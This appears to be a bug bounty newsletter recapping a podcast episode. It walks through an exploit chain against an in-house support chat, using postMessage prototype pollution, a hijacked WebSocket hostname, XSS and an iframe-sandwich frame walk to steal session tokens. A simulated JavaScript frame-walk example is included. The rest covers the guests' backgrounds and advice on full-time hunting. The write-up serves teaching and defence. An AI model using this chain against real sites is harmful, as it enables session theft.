[HackerNotes Ep. 144] Google’s Top AI Hackers: Busfactor and Monke
In this episode: Joseph is joined by Vitor Falcão and Ciarán Cotter to discuss their success at the recent Google LHE in Mexico, as well as their journey and routines in full-time hacking.
Hacker TL;DR
Map client-side message flow aggressively: enumerate postMessage sinks, then hunt for JSON.parse followed by Object.assign, which lets a `__proto__` key in the parsed JSON rewrite the target object's prototype. Many apps gate on typeof === "string" before parsing; craft inputs that pass the gate, then flip config flags that scanners never reach by exploring dead-code paths and lazy-loaded chunks.
Abuse overwritable config to hijack backends: if a config value (a version string, a hostname) resolves the WebSocket or API base URL, redirect it to attacker-controlled infra and feed the client whatever it trusts from the server.
Succeeding in LHEs and as a full-time Hunter:
Optimize for MVH: target impact categories and bonus bug types the host company values.
Collab with people who have expertise in different areas to cover more ground.
Keep a tight routine: set fixed hacking blocks, schedule rest and study, and when focus drops, switch tasks instead of forcing it.

HACKERNOTES;
Bring a bug!
Before we even tell you who Busfactor is, let's talk about a complex, client-side-heavy exploit chain from him (he helped me write the writeup below). Let's go!
A major, well-known company was using an in-house support chat, which immediately caught his attention: building something that complex in-house often introduces security flaws.
The chat ran in an `iframe` on the product page, communicating via `postMessage`. He discovered there were no origin checks and thought he had an easy win. But after days of digging through minified JavaScript, every lead turned into a dead end, with no interesting bugs to show for it.
After taking a break, he returned to the chat and spotted a curious code pattern: a `JSON.parse` immediately followed by an `Object.assign`. That combination is a classic prototype pollution gadget: `JSON.parse` keeps a `__proto__` key as an ordinary property, and `Object.assign` then writes it through the prototype setter of the target object. He couldn't find any useful functions or variables to poison at first, forcing him to dive deep into the code once more.
Hours into the hunt, he found a deeply nested `config` property. It was read during the iframe setup to define the hostname of the chat's WebSocket server. He could send a stringified JSON parameter, trigger the prototype pollution, and overwrite that property. He then stood up a malicious WebSocket server and achieved XSS by faking an agent message containing his payload.
On its own, this XSS had no impact: it fired on the chat origin, separate from the product, and the chat needed to connect to the legitimate server to access any sensitive data. To complete the attack, he used the "iframe sandwich" technique: a malicious page that loaded both the chat URL (where his XSS would fire) and the main product page, which in turn embeds the legitimate chat iframe. Because his XSS-controlled window and the legitimate chat iframe shared the same origin, the same-origin policy let the first reach into the second. He walked the frame tree into the real iframe and stole the user's session token, achieving a full session takeover.
This bug was rated critical because the chat shipped with all of the company's hundreds of products, so he could hijack a victim's session on any of them.
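The frame walk that makes the sandwich work, as an added example that is not part of the original writeup. It relies on one browser rule: a cross-origin window still exposes `frames` and `length`, but reading its `localStorage` (or `document`) throws a SecurityError, so a try/catch naturally filters the tree down to same-origin windows. The window objects, origins and the `session` storage key are constructed stand-ins; `makeWindow`, `buildSandwich` and `collectSameOriginTokens` are assumed names, not the chat's or the hunter's code.

```javascript
// Added example, not code from the page or from the guests.
// Assumed names: CHAT_ORIGIN, RUNNING_IN, makeWindow, buildSandwich, collectSameOriginTokens.
const CHAT_ORIGIN = "https://chat.example.com";   // assumed origin of the chat iframe
const RUNNING_IN = CHAT_ORIGIN;                    // the XSS payload executes in this origin

// Minimal stand-in for a browser window (constructed for this example).
function makeWindow(origin, session, frames) {
  const storage = session ? { session } : {};
  return {
    frames, // traversable even cross-origin, as in a real browser
    get localStorage() {
      // A real browser throws SecurityError on cross-origin storage access.
      if (origin !== RUNNING_IN) throw new Error("SecurityError");
      return { getItem: (k) => storage[k] ?? null };
    },
  };
}

// The sandwich: attacker page -> [chat URL where the XSS fires,
//                                 product page -> [legitimate chat iframe]].
function buildSandwich() {
  const xssChat = makeWindow(CHAT_ORIGIN, null, []);              // fed by the malicious WS server
  const legitChat = makeWindow(CHAT_ORIGIN, "sess-3f9a", []);     // connected to the real backend
  const product = makeWindow("https://product.example", "prod-token", [legitChat]);
  const attacker = makeWindow("https://evil.example", null, [xssChat, product]);
  xssChat.top = attacker; // what `window.top` returns inside the XSS'd frame
  return { attacker, xssChat, product, legitChat };
}

// Breadth-first walk from `top`, trying each window's storage; cross-origin
// windows throw and are skipped, but their child frames are still descended into.
function collectSameOriginTokens(top) {
  const tokens = [];
  const queue = [top];
  while (queue.length) {
    const w = queue.shift();
    try {
      const t = w.localStorage.getItem("session");
      if (t) tokens.push(t);
    } catch {
      // cross-origin window: no storage access, keep walking its children
    }
    for (let i = 0; i < w.frames.length; i++) queue.push(w.frames[i]);
  }
  return tokens;
}

function demo() {
  const { xssChat, product } = buildSandwich();
  let productReadable = true;
  try { product.localStorage; } catch { productReadable = false; }
  return {
    tokens: collectSameOriginTokens(xssChat.top), // ["sess-3f9a"]: only the legit chat frame
    productReadable,                               // false: the product origin stays off limits
  };
}
```

Note what the walk does and does not reach: the product page's own storage is never readable, only the chat-origin frame nested inside it, which is exactly why the XSS had to be combined with a page that embeds the legitimate, authenticated chat.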
Shit, this was a roller coaster. hahahah
Who Busfactor is: before trying bug bounty, Vitor (Busfactor) was a software developer and then an SRE. He got his first bounty around 14 months ago, and 3 months ago he transitioned to full-time bug bounty hunting. He has been hosting hackalongs for us in our Discord server, if you're interested in watching him hack and find those crazy exploit chains live.
What Busfactor means: the "bus factor" is the risk that critical knowledge inside a company is concentrated in one person and lost if they're gone. He got his handle from a near accident: while he was leading an SRE team, a bus almost hit him, and someone said "if you died right now it would have been a huge bus factor for us," because a ton of valuable knowledge would have gone with him.
When he joined the HackTheBox team, they used hacker handles as email addresses, so he chose busfactor, thinking it could probably be changed later. But guess what, it just stuck.
Or maybe you’re 7urb0 and you don’t give a fuck about that
Google LHE in Mexico and Tips on Going Full-Time
Monke and Bus met in person at the LHE, but they had already talked in our Full-Time Hunters' exclusive chat on Discord, so they knew they could trust each other to hack together.
Most of this episode was about their recent LHE and the full-time bug bounty experience, so I'll keep this part shorter. Here are some takeaways on why their duo performed so well, plus tips about going full-time on bug bounty:
AI focused: even though they are both very proficient with client-side stuff, Google has been focusing a lot on AI, and everything around it is very new. It turned out great!
Know what the host company values: Google typically awards MVH to whoever finds the most critical bug, not to whoever earned the most money.
If the hosting company is paying a bonus for a type of bug, maybe you should try focusing on that.
If you're thinking about going full-time, have multiple plans in case it doesn't go well; being a full-time hunter requires a lot of dedication.
Monke advises keeping bug bounty as a hobby for as long as you can. It's the perfect hobby if you like learning new stuff, and when you don't find a bug, it's not the end of the world. Get a ton of experience before thinking about going full-time.
Busfactor treats bug bounty like a full-time job, with set times to hack, rest, exercise, and eat. This fixed routine helps him focus during work hours and disconnect during rest time.
When Bus is tired, he switches to reading blog posts, studying topics he's interested in, or going to the gym. He believes forcing focus when his brain resists creates more stress and hurts his performance, and bug bounty's freedom lets him "give up" for the day and hit the gym or read, something office workers can't do.
If you're not full-time yet, the boys advise being careful about how much time you spend working. You could end up working all day at your job and then all night as a bug hunter; knowing when to stop and go take care of your family or whatever other duties you have is important. When your hobby is paying your bills instead of only the beers, maybe it's time to start thinking about the viability of making it your full-time thing.
If you want to check their blogs, I’ll link them below:



That’s it for the week,
and as always, keep hacking!